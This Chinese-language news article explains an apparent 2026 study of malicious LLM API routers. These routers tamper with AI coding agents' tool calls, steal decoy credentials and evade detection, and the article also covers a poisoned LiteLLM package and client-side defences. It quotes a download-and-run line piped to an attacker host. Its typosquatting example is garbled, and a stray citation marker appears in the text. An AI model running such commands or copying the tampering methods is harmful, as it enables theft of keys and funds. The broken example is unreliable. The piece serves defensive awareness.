你的AI在替你干活,中转站老板在替你花钱!
你花大价钱买的AI助手,可能正在用你的钱包给别人刷礼物!
第三方AI中转站正成为大模型供应链最脆弱的一环,它们手握你的API密钥、代码和钱包私钥,随时能偷能改,而你完全看不见。
你以为是高速公路,其实是收费站装了后门
你打开AI编程助手,敲下一行代码,它秒回一个答案。中间发生了什么?你的请求先飞到某个“中转站”,再由它转发给OpenAI或者Anthropic的服务器。整个过程你在电脑屏幕上只看到一个光标在闪。
但这根光标背后的世界里,中转站老板能看到你发的每一个字、每一个API密钥、每一次工具调用。它不是一条透明的管道,它是一个坐在管道正中间的人,手里攥着你的所有数据。
2026年4月,加州大学圣芭芭拉分校和圣地亚哥分校的研究团队发布了一篇论文,他们买了28个付费中转站、收集了400个免费中转站,用诱饵凭证和加密钱包做了一次系统性测试。结果让整个AI圈炸了锅。
9个中转站在返回给你的AI回答里偷偷塞了恶意代码。17个中转站拿到AWS云服务的诱饵凭证后,转头就去试了试能不能用。还有1个更狠,直接把研究人员放在“蜜罐”里的以太坊钱包给清空了。
注意,这不是理论推演,不是模拟实验,是真实发生的资金转移。
消息传开后,有开发者在社交媒体上问了一句“LLM routers 是中转站那种么”,论文作者回了一个字:是的。
对,就是你在淘宝和闲鱼上花几十块钱买的那种“便宜API”。
你省下的每一分钱,都在给对方交学费
淘宝上搜“Claude API”,你会看到大量标着“官方直连”“1:1原生”“不限量”的商品。价格呢?官方Claude Opus输出100万Token要25美元,这些店里可能只要十分之一。
便宜的原因写在产品介绍里:企业级客户折扣、大额预付返利、教育补贴额度。但真正让价格能打到骨折的,是一个叫“多供应商混合调度”的东西。
翻译成人话就是:你付了Claude Opus的钱,中转站把你这道题扔给DeepSeek去做,然后把DeepSeek的答案包装成Claude的答案还给你。你写文章、做PPT、生成图片这些活,根本不需要顶级模型出手,便宜模型完全够用。你分不出来,中转站赚翻了。
听起来好像也没什么大不了的?但你想想,中转站能做到“识别任务类型、选择最便宜的模型”,前提是什么?
前提是它必须完完整整地看到你的每一条请求的每一个字。
你的系统提示词、你的工具定义、你代码里的变量名、你环境变量里的API密钥,全部明文过一遍它的服务器。
这就好比你请了一个代购帮你买限量款球鞋,代购确实买到了,但他顺便把你家钥匙配了一把。
2026年3月24日,这个比喻变成了现实。一个叫LiteLLM的开源AI网关在PyPI上被人投毒了。攻击者伪装发布者,把恶意代码塞进了LiteLLM 1.82.7和1.82.8两个版本的Python包里。这个包总下载量超过4.8亿次。
恶意代码做的事很简单:Python一启动就自动执行,扫描你电脑里的SSH密钥、AWS凭证、Kubernetes配置、加密钱包私钥,用RSA加密打包,上传到攻击者的服务器。
最骚的操作是,攻击者连你钱包里有多少比特币都提前看好了。
有安全从业者在社交媒体上评论这件事时说了一句大实话:“一旦你信任了中间层,你就已经放弃了控制权。”
偷完钱还让AI帮你数,顺便把门锁换了
说到这里你可能会想:那我不用中转站了,我直接连官方API行不行?
行,当然行。但问题在于,很多人根本连不上。
中国大陆的开发者要直接访问OpenAI和Anthropic的API,需要处理网络、支付、账号验证等一系列问题。中转站提供了一个“一键搞定”的解决方案。这个需求是真实的,所以这个灰色市场才这么繁荣。
但繁荣意味着竞争激烈,竞争激烈意味着有些中转站老板开始动歪脑筋。
论文里记录了两个“自适应规避”的案例。有一个中转站,前50次请求完全正常,第51次开始注入恶意代码。你测试的时候测不出来,用着用着就中招了。
另一个中转站更精准:只对“YOLO模式”的会话动手,而且只针对Rust和Go项目。
“YOLO模式”是什么?就是AI自动批准每一条命令、自动执行每一个工具调用的模式。你打开这个模式,等于给AI发了一张空白支票,它想干什么就干什么,不用每次问你“我要执行这个命令了行不行”。
研究人员的测试结果让所有用YOLO模式的人后背发凉:在他们部署的440个模拟开发者会话中,401个已经在YOLO模式下运行。这401个会话里,攻击者根本不需要什么高级的“自适应规避”,直接改一条命令就够了。
更吓人的是密码泄露的规模。研究人员在中文论坛和微信群里故意泄露了一个OpenAI API密钥,这个密钥被中转站拿到后,跑出了1亿个GPT-5.4 Token,暴露了至少7个Codex用户会话,其中一个会话里出现了多个不同的凭证。
他们还部署了20个域名和20个IP的“弱密码中转站诱饵”,这些诱饵在几天内收到了超过4万次未授权访问,最终服务了大约20亿Token,暴露了99个凭证,涉及440个Codex会话、398个不同的项目或主机。
440个会话,每一个都有shell执行路径。99个凭证,从API密钥到数据库密码,全部明文过了一遍中转站的服务器。
这些数据说明了一件事:中转站的问题不是“有些坏人会作恶”,而是这个架构本身没有任何机制阻止作恶。你看到的每一条AI回答,都经过了至少一个人的完整检查、修改、或者复制。
你花五十块买的东西,值五千块的风险
论文团队测试了四个主流AI编程框架——OpenClaw、OpenCode、OpenAI的Codex、Anthropic的Claude Code——没有一个内置“响应完整性验证”机制。
翻译一下:这四个框架发给你的AI回答,和AI模型实际生成的回答之间,没有任何加密签名或者校验手段来保证一致。
中转站把“curl https://get.example.com/cli.sh | bash”改成“curl https://attacker.sh | bash”,你的AI会乖乖执行第二条。JSON格式是对的,工具名称是对的,参数结构是对的,一切看起来都很正常。
攻击者甚至不用让你下载什么东西。改一条命令的URL就够了。
论文里还揭示了一个更隐蔽的攻击方式:不直接改URL,而是把“pip install requests”里的“requests”改成“requests”(多了一个s),一个typosquatting包。名字看着差不多,LLM审阅的时候根本看不出来,你的AI默默装了一个后门。
论文作者之一在社交媒体上回应“LLM routers 是中转站那种么”时只回了一个“是的”,转发量远远超过了原帖。
有安全从业者在评论区指出:这和传统的网络中间人攻击不一样。传统攻击需要伪造TLS证书,现在的AI中转站是你自己配置的、你主动信任的、你亲手把流量送过去的。
你没有被人攻击,你是自愿把钥匙交出去的。
更讽刺的是,有些中转站自己不偷,但它从别的被偷的中转站那里拿数据。论文里的“弱密码中转站诱饵”实验就证明了这一点:一个弱密码的中转站被攻击者攻破后,经过它的所有流量全部暴露。你在用一个中转站,但这个中转站背后可能还有三个中转站,每一个都能看到你的数据。
攻击面不是一层,是一整条链。
你手里的牌,其实比你想的多
看到这里你可能想直接把所有中转站都删了。但先别急,论文团队也测了几种客户端防御方案,有些是你今天就能用的。
第一种叫“策略门禁”:只允许AI执行白名单内的命令,白名单外的直接拒绝。测下来100%拦截了直接改URL的攻击,误报率1%。缺点也很明显——如果攻击者把恶意代码放在白名单域名上,这个门禁就没用了。
第二种叫“响应异常检测”:用一个机器学习模型给每个AI返回的工具调用打分,分数太高的就标记出来人工审阅。在误报率6.7%的情况下,能抓到89%的直接注入攻击。但它对“改名攻击”和“条件触发攻击”的效果差很多,分别只有50%和51%左右。
第三种是“透明度日志”:把所有请求和响应都记下来,做好哈希,方便事后追溯。它不阻止攻击,但出了事之后你能知道到底哪些会话被影响了。
这三种方案有一个共同的致命缺陷:它们都只能减少暴露,不能证明AI返回的结果就是AI模型实际生成的结果。
真正的解决方案需要AI厂商出手——在API返回里加上加密签名,让客户端能验证“这个工具调用确实出自GPT-5.4,没有被任何人改过”。论文给出了一个极简的签名格式:厂商签名一个包含模型名、工具调用、请求随机数和有效时间窗口的JSON对象,客户端在执行任何工具调用之前先验签,验不过就不执行【14†L11-L17】。
目前OpenAI、Anthropic、Google的API都没有提供这种签名机制。
安全从业者在推特上说了一句意味深长的话:“the router became the attacker not the model”——中转站变成了攻击者,模型反倒不是问题。
你花五十块钱买中转站Token的时候,省下的是钱,押上的是你电脑里所有的密钥、所有代码仓库的访问权、所有云服务的控制权。
论文里那个被清空的以太坊钱包,余额不到50美元。研究人员用的是“名义余额”做诱饵,损失控制在最小范围。但如果你是中转站的普通用户,你钱包里的ETH可能不只是50美元。
论文团队最后发布了一份声明,说他们不会公开攻击工具的代码,因为“防御的价值超过了攻击的风险”。但他们没说的是,写一篇论文需要买28个付费中转站、部署20个域名做诱饵、泄露一个真实的OpenAI密钥做实验。
这些东西,一个认真想要作恶的人,也买得到。
论文里那个“前50次请求正常”的规避策略,在测试中被记录了下来。但下一个中转站会用前100次吗?还是前200次?没有人知道。
因为研究者只观察了428个中转站。中国模型在OpenRouter上的Token份额已经超过45%,而淘宝上标着“Claude Opus”的商品还在不断上架。下一个蜜罐被清空的时候,里面装的可能就不只是研究经费了。
原文期刊 / arXiv预印本 / 2026年4月8日 / Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain / 加州大学圣芭芭拉分校、加州大学圣地亚哥分校、Fuzzland、World Liberty Financial